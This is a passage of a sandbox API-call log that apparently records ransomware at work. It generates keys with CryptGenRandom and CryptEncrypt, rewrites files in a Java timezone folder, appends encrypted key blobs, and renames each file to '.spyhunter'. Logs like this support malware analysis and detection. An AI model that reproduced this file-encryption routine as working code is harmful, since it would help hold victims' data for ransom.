lpNumberOfBytesWritten=0x25ce454*=0x4, lpOverlapped=0x0) returned 1 [0170.845] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce454, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce454*=0x30, lpOverlapped=0x0) returned 1 [0170.845] CloseHandle (hObject=0x178) returned 1 [0170.845] GetProcessHeap () returned 0x2c0000 [0170.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.845] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Juneau.spyhunter") returned 68 [0170.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Juneau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\juneau"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Juneau.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\juneau.spyhunter")) returned 1 [0170.846] GetProcessHeap () returned 0x2c0000 [0170.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.846] GetProcessHeap () returned 0x2c0000 [0170.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0170.846] GetProcessHeap () returned 0x2c0000 [0170.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8bc0 | out: hHeap=0x2c0000) returned 1 [0170.847] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce490 | out: pbBuffer=0x25ce490) returned 1 [0170.847] GetProcessHeap () returned 0x2c0000 [0170.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0170.847] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce488*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce488*=0x30) returned 1 [0170.847] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Jamaica" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\jamaica"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0170.848] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Jamaica") returned 59 [0170.848] StrStrW (lpFirst="Jamaica", lpSrch=".txt") returned 0x0 [0170.848] GetProcessHeap () returned 0x2c0000 [0170.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.848] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce44c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce44c*=0xe9, lpOverlapped=0x0) returned 1 [0170.849] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.849] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x25ce44c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce44c*=0xe9, lpOverlapped=0x0) returned 1 [0170.849] GetProcessHeap () returned 0x2c0000 [0170.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.849] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.849] WriteFile (in: hFile=0x178, lpBuffer=0x25ce48c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce44c, lpOverlapped=0x0 | out: lpBuffer=0x25ce48c*, lpNumberOfBytesWritten=0x25ce44c*=0x4, lpOverlapped=0x0) returned 1 [0170.850] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce44c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce44c*=0x30, lpOverlapped=0x0) returned 1 [0170.850] CloseHandle (hObject=0x178) returned 1 [0170.850] GetProcessHeap () returned 0x2c0000 [0170.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.850] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Jamaica.spyhunter") returned 69 [0170.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Jamaica" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\jamaica"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Jamaica.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\jamaica.spyhunter")) returned 1 [0170.851] GetProcessHeap () returned 0x2c0000 [0170.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.851] GetProcessHeap () returned 0x2c0000 [0170.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0170.851] GetProcessHeap () returned 0x2c0000 [0170.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8b00 | out: hHeap=0x2c0000) returned 1 [0170.851] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce490 | out: pbBuffer=0x25ce490) returned 1 [0170.851] GetProcessHeap () returned 0x2c0000 [0170.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0170.851] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce488*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce488*=0x30) returned 1 [0170.851] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Iqaluit" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\iqaluit"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0170.852] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Iqaluit") returned 59 [0170.852] StrStrW (lpFirst="Iqaluit", lpSrch=".txt") returned 0x0 [0170.852] GetProcessHeap () returned 0x2c0000 [0170.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.852] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce44c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce44c*=0x428, lpOverlapped=0x0) returned 1 [0170.978] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.979] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x428, lpNumberOfBytesWritten=0x25ce44c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce44c*=0x428, lpOverlapped=0x0) returned 1 [0170.979] GetProcessHeap () returned 0x2c0000 [0170.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.979] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.979] WriteFile (in: hFile=0x178, lpBuffer=0x25ce48c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce44c, lpOverlapped=0x0 | out: lpBuffer=0x25ce48c*, lpNumberOfBytesWritten=0x25ce44c*=0x4, lpOverlapped=0x0) returned 1 [0170.979] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce44c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce44c*=0x30, lpOverlapped=0x0) returned 1 [0170.979] CloseHandle (hObject=0x178) returned 1 [0170.979] GetProcessHeap () returned 0x2c0000 [0170.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.979] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Iqaluit.spyhunter") returned 69 [0170.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Iqaluit" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\iqaluit"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Iqaluit.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\iqaluit.spyhunter")) returned 1 [0170.981] GetProcessHeap () returned 0x2c0000 [0170.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.981] GetProcessHeap () returned 0x2c0000 [0170.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0170.981] GetProcessHeap () returned 0x2c0000 [0170.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8a40 | out: hHeap=0x2c0000) returned 1 [0170.981] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce488 | out: pbBuffer=0x25ce488) returned 1 [0170.981] GetProcessHeap () returned 0x2c0000 [0170.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0170.981] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce480*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce480*=0x30) returned 1 [0170.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vevay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vevay"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0170.983] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vevay") returned 65 [0170.983] StrStrW (lpFirst="Vevay", lpSrch=".txt") returned 0x0 [0170.983] GetProcessHeap () returned 0x2c0000 [0170.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.983] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce444, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce444*=0x2d4, lpOverlapped=0x0) returned 1 [0170.984] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.984] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x25ce444, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce444*=0x2d4, lpOverlapped=0x0) returned 1 [0170.985] GetProcessHeap () returned 0x2c0000 [0170.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.985] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.985] WriteFile (in: hFile=0x178, lpBuffer=0x25ce484*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce444, lpOverlapped=0x0 | out: lpBuffer=0x25ce484*, lpNumberOfBytesWritten=0x25ce444*=0x4, lpOverlapped=0x0) returned 1 [0170.985] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce444, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce444*=0x30, lpOverlapped=0x0) returned 1 [0170.985] CloseHandle (hObject=0x178) returned 1 [0170.985] GetProcessHeap () returned 0x2c0000 [0170.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.985] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vevay.spyhunter") returned 75 [0170.985] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vevay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vevay"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vevay.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vevay.spyhunter")) returned 1 [0170.987] GetProcessHeap () returned 0x2c0000 [0170.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.987] GetProcessHeap () returned 0x2c0000 [0170.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0170.987] GetProcessHeap () returned 0x2c0000 [0170.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04788 | out: hHeap=0x2c0000) returned 1 [0170.987] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce488 | out: pbBuffer=0x25ce488) returned 1 [0170.987] GetProcessHeap () returned 0x2c0000 [0170.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0170.987] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce480*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce480*=0x30) returned 1 [0170.987] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Tell_City" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\tell_city"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0170.988] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Tell_City") returned 69 [0170.988] StrStrW (lpFirst="Tell_City", lpSrch=".txt") returned 0x0 [0170.988] GetProcessHeap () returned 0x2c0000 [0170.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.989] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce444, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce444*=0x374, lpOverlapped=0x0) returned 1 [0171.525] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffc8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.525] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x374, lpNumberOfBytesWritten=0x25ce444, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce444*=0x374, lpOverlapped=0x0) returned 1 [0171.525] GetProcessHeap () returned 0x2c0000 [0171.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0171.525] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.525] WriteFile (in: hFile=0x178, lpBuffer=0x25ce484*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce444, lpOverlapped=0x0 | out: lpBuffer=0x25ce484*, lpNumberOfBytesWritten=0x25ce444*=0x4, lpOverlapped=0x0) returned 1 [0171.526] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce444, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce444*=0x30, lpOverlapped=0x0) returned 1 [0171.526] CloseHandle (hObject=0x178) returned 1 [0171.526] GetProcessHeap () returned 0x2c0000 [0171.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.526] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Tell_City.spyhunter") returned 79 [0171.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Tell_City" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\tell_city"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Tell_City.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\tell_city.spyhunter")) returned 1 [0171.530] GetProcessHeap () returned 0x2c0000 [0171.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.530] GetProcessHeap () returned 0x2c0000 [0171.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.530] GetProcessHeap () returned 0x2c0000 [0171.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d548 | out: hHeap=0x2c0000) returned 1 [0171.530] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce480 | out: pbBuffer=0x25ce480) returned 1 [0171.530] GetProcessHeap () returned 0x2c0000 [0171.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.530] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce478*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce478*=0x30) returned 1 [0171.531] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Creston" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\creston"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.536] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Creston") returned 59 [0171.536] StrStrW (lpFirst="Creston", lpSrch=".txt") returned 0x0 [0171.536] GetProcessHeap () returned 0x2c0000 [0171.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.536] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce43c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce43c*=0x49, lpOverlapped=0x0) returned 1 [0171.537] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.537] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x25ce43c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce43c*=0x49, lpOverlapped=0x0) returned 1 [0171.537] GetProcessHeap () returned 0x2c0000 [0171.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.537] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.537] WriteFile (in: hFile=0x178, lpBuffer=0x25ce47c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce43c, lpOverlapped=0x0 | out: lpBuffer=0x25ce47c*, lpNumberOfBytesWritten=0x25ce43c*=0x4, lpOverlapped=0x0) returned 1 [0171.537] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce43c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce43c*=0x30, lpOverlapped=0x0) returned 1 [0171.537] CloseHandle (hObject=0x178) returned 1 [0171.538] GetProcessHeap () returned 0x2c0000 [0171.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0171.538] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Creston.spyhunter") returned 69 [0171.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Creston" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\creston"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Creston.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\creston.spyhunter")) returned 1 [0171.539] GetProcessHeap () returned 0x2c0000 [0171.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0171.539] GetProcessHeap () returned 0x2c0000 [0171.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.539] GetProcessHeap () returned 0x2c0000 [0171.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e609c0 | out: hHeap=0x2c0000) returned 1 [0171.539] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce480 | out: pbBuffer=0x25ce480) returned 1 [0171.539] GetProcessHeap () returned 0x2c0000 [0171.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.540] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce478*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce478*=0x30) returned 1 [0171.540] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Costa_Rica" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\costa_rica"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.541] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Costa_Rica") returned 62 [0171.541] StrStrW (lpFirst="Costa_Rica", lpSrch=".txt") returned 0x0 [0171.541] GetProcessHeap () returned 0x2c0000 [0171.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.541] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce43c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce43c*=0x89, lpOverlapped=0x0) returned 1 [0171.542] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.542] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x89, lpNumberOfBytesWritten=0x25ce43c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce43c*=0x89, lpOverlapped=0x0) returned 1 [0171.542] GetProcessHeap () returned 0x2c0000 [0171.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.542] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.542] WriteFile (in: hFile=0x178, lpBuffer=0x25ce47c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce43c, lpOverlapped=0x0 | out: lpBuffer=0x25ce47c*, lpNumberOfBytesWritten=0x25ce43c*=0x4, lpOverlapped=0x0) returned 1 [0171.542] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce43c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce43c*=0x30, lpOverlapped=0x0) returned 1 [0171.542] CloseHandle (hObject=0x178) returned 1 [0171.543] GetProcessHeap () returned 0x2c0000 [0171.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0171.543] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Costa_Rica.spyhunter") returned 72 [0171.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Costa_Rica" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\costa_rica"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Costa_Rica.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\costa_rica.spyhunter")) returned 1 [0171.544] GetProcessHeap () returned 0x2c0000 [0171.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0171.544] GetProcessHeap () returned 0x2c0000 [0171.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.544] GetProcessHeap () returned 0x2c0000 [0171.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfa10 | out: hHeap=0x2c0000) returned 1 [0171.544] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce478 | out: pbBuffer=0x25ce478) returned 1 [0171.544] GetProcessHeap () returned 0x2c0000 [0171.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.545] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, 